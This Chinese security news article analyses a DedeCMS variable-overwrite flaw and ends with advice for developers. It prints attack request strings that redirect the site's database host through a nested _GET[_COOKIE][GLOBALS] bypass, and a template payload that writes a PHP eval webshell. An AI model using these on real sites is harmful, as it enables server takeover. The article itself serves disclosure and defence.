【51CTO.com綜合報(bào)道】

事件背景：

近日很多網(wǎng)站被爆遭到入侵，經(jīng)過(guò)安全寶安全實(shí)驗(yàn)室研究分析，這些網(wǎng)站使用的都是DedeCMS內(nèi)容管理系統(tǒng)，DedeCMS爆出一個(gè)很?chē)?yán)重的漏洞，攻擊者可以直接向服務(wù)器中寫(xiě)入"一句話木馬"。

DedeCMS的漏洞成因主要是由于變量覆蓋導(dǎo)致而成，攻擊者通過(guò)通過(guò)提交變量，覆蓋數(shù)據(jù)庫(kù)連接配置的全局變量，從而可以使被攻擊的網(wǎng)站反向連接攻擊者指定的數(shù)據(jù)庫(kù)，讀取指定的內(nèi)容，并在被攻擊的網(wǎng)站中直接寫(xiě)入WebShell。從整個(gè)攻擊過(guò)程來(lái)看，這種攻擊利用方式也比較巧妙，避開(kāi)了傳統(tǒng)的注入，破解，登錄后臺(tái)和上傳木馬的攻擊模式，攻擊者可以在未授權(quán)的前提下直接向網(wǎng)站目錄中寫(xiě)入WebShell，從而控制網(wǎng)站，危害嚴(yán)重。

隨著網(wǎng)站管理員的安全意識(shí)的逐漸提高，網(wǎng)絡(luò)安全設(shè)備的引入，模塊和程序的過(guò)濾;傳統(tǒng)的入侵模式也越來(lái)越捉襟見(jiàn)肘，從這次攻擊中，我們發(fā)現(xiàn)傳統(tǒng)的Web攻擊思想也在發(fā)生變換，它們正慢慢由正向攻擊向反向攻擊過(guò)渡，其實(shí)在系統(tǒng)的攻擊中，反向攻擊早就存在，攻擊者為了繞過(guò)防火墻一些列的前端過(guò)濾設(shè)備，利用木馬使被攻擊機(jī)器自己發(fā)起連向攻擊者機(jī)器的請(qǐng)求，而防火墻通常是不會(huì)攔截機(jī)器主動(dòng)發(fā)現(xiàn)的連接，從而攻擊者很容易繞過(guò)了前端一系列的過(guò)濾和障礙。

分析報(bào)告：

下面我們一起來(lái)看下Dede的漏洞原因，首先我們來(lái)看個(gè)變量覆蓋漏洞的原型基礎(chǔ)：

VulTest.php:

<?php

$anquanbao="imiyoo_first";

foreach($_GET  as $key=>$value)

$$key=$value;

echo "\$anquanbao=".$anquanbao;

?>

攻擊者顯然通過(guò)$_GET提交變量覆蓋已經(jīng)定義的變量，效果如下圖：

攻擊前圖片

攻擊后圖片($anquanbao變量已經(jīng)被覆蓋)

有了這個(gè)漏洞的基礎(chǔ)，現(xiàn)在我們來(lái)看看Dede的漏洞詳細(xì)信息,漏洞主要發(fā)生在文件/plus/mytag_js.php中：

我們首先讀下這段代碼的處理流程，程序在開(kāi)始會(huì)獲取用戶提交的$aid變量，如果需要顯示不需要顯示緩存內(nèi)容，則會(huì)從數(shù)據(jù)庫(kù)表'#@_mytag'中讀取記錄，并將讀取的$tagbody內(nèi)容以Dede模版形式寫(xiě)入緩存文件中。

在這里很顯然存在變量$aid的注入漏洞，但由于該表的內(nèi)容一般都為空，而且Dede對(duì)提交的單引號(hào)都會(huì)有過(guò)濾，基本屬于雞肋漏洞；但是如果結(jié)合變量覆蓋漏洞，攻擊者就可以利用該漏洞覆蓋數(shù)據(jù)庫(kù)配置文件的連接信息，將數(shù)據(jù)庫(kù)的連接重定向到攻擊者可以控制的一個(gè)數(shù)據(jù)庫(kù)，那么這樣攻擊者就能完全控制$tagbody的內(nèi)容，而且在DedeCMS文章管理系統(tǒng)中，模版中是可以嵌入PHP代碼，也就是說(shuō)攻擊者可以執(zhí)行自己的PHP代碼，從而可以輕易地向服務(wù)器中寫(xiě)入一句話木馬，達(dá)到攻擊的效果。

在對(duì)漏洞進(jìn)行測(cè)試的時(shí)候，我們發(fā)現(xiàn)Dede產(chǎn)生變量覆蓋漏洞的代碼在/include/common.inc.php中，如下：

通過(guò)這段代碼我們可以對(duì)程序中的任何變量進(jìn)行覆蓋，為了覆蓋數(shù)據(jù)庫(kù)配置文件中的變量，其實(shí)我們覆蓋$cfg_dbhost或$GLOBALS[cfg_dbhost]都可以，因此我們可以提交形如下面的測(cè)試代碼：

   Ø mytag_js.php?_GET[cfg_dbhost]=www.anquanbao.com

   Ø mytag_js.php?_GET[GLOBALS][cfg_dbhost]= www.anquanbao.com

不過(guò)DedeCMS對(duì)這種形式的攻擊也是有防范，但只是對(duì)提交的變量中的鍵值進(jìn)行了判斷，代碼如下：

但是這個(gè)變量$_k只是對(duì)一維數(shù)據(jù)的鍵值進(jìn)行判斷，而Dede對(duì)變量的提取卻是支持多維的，如果攻擊者提交的是多維的變量就可以很容易繞過(guò)，為了繞過(guò)正則的檢測(cè)，同時(shí)達(dá)到覆蓋變量的效果;因此我們可以很容易想到$_COOKIE變量，更重要的是Dede也支持$_COOKIE提交變量，因此我們就可以得到如下的有效攻擊代碼： 

Ø mytag_js.php?_GET[_COOKIE][GLOBALS][cfg_dbhost]=www.anquanbao.com

利用上面的代碼就可以繞過(guò)DedeCMS的正則檢測(cè)，同時(shí)可以覆蓋$GLOBALS[cfg_dbhost]變量。

分析總結(jié)：

通過(guò)對(duì)上面的分析，那么現(xiàn)在我們就能很清楚整個(gè)攻擊流程：

1 攻擊者會(huì)預(yù)先準(zhǔn)備一個(gè)MySQL數(shù)據(jù)庫(kù)，數(shù)據(jù)庫(kù)中包含有一個(gè)表明為'#@_mytag'的數(shù)據(jù)表，其中'#@'是待攻擊數(shù)據(jù)庫(kù)的表前綴，并在表中插入一條記錄來(lái)控制$tagbody的內(nèi)容，使其能夠?qū)懭胍痪湓捘抉R，而且Dede利用模版寫(xiě)入一句話木馬的代碼如下:

{dede:php}

$fp = @fopen("test.php", \'a\');

@fwrite($fp, \'<?php eval($_POST[test]) ?>\');

echo "OK";

@fclose($fp);

{/dede:php}

2 提交變量覆蓋語(yǔ)句讀取表中指定的內(nèi)容，即可在當(dāng)前路徑下寫(xiě)入一句話木馬。

鑒于很多使用DedeCMS的網(wǎng)站還沒(méi)有修補(bǔ)該漏洞，因此在這里就不公布危害性攻擊代碼。

安全建議:

許多程序員在對(duì)$_GET,$_POST或$_COOKIE獲取的變量處理中，進(jìn)行了對(duì)多維數(shù)組變量的遞歸解析，但是卻在過(guò)濾的時(shí)候并沒(méi)有對(duì)每一維的鍵值進(jìn)行判斷和檢測(cè)；例如，在本次爆出的Dede的0day，程序員就只考慮到檢測(cè)二維數(shù)組的鍵值，但是攻擊者卻可以通過(guò)提交三維數(shù)組生成COOKIE變量輕易繞過(guò)。因此程序員如果在保證程序能夠?qū)Χ嗑S變量進(jìn)行解析的時(shí)候，同時(shí)也是需要對(duì)每一維的鍵值進(jìn)行有效檢測(cè)和判斷。